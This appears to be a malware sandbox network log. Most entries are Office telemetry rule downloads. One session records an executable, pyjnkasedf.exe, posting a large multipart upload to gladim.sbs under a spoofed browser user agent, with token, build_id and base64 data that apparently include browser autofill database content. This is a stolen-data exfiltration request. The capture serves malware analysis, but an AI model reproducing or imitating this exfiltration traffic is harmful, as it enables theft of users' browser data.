                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      65192.168.2.104978813.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:32 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                      x-ms-request-id: dcf51672-d01e-005a-5c91-3f7fd9000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213832Z-174f7845968zgtf6hC1EWRqd8s0000000uxg00000000cant
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      66192.168.2.104978913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:32 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                      x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213832Z-174f78459684bddphC1EWRbht400000011ng00000000gyu2
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      67192.168.2.104978713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:32 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                      x-ms-request-id: b24172ee-901e-0016-3789-3fefe9000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213832Z-174f7845968xlwnmhC1EWR0sv800000011y00000000018dk
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      68192.168.2.104979013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:32 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:32 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                      x-ms-request-id: 3ecdff04-701e-003e-1903-4279b3000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213832Z-174f7845968px8v7hC1EWR08ng000000127000000000dc84
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      69192.168.2.104979194.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC320OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCGDGIDGIJKKEBGDAECA
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 142457
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 47 44 47 49 44 47 49 4a 4b 4b 45 42 47 44 41 45 43 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------HCGDGIDGIJKKEBGDAECAContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------HCGDGIDGIJKKEBGDAECACont
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                      Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:33 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
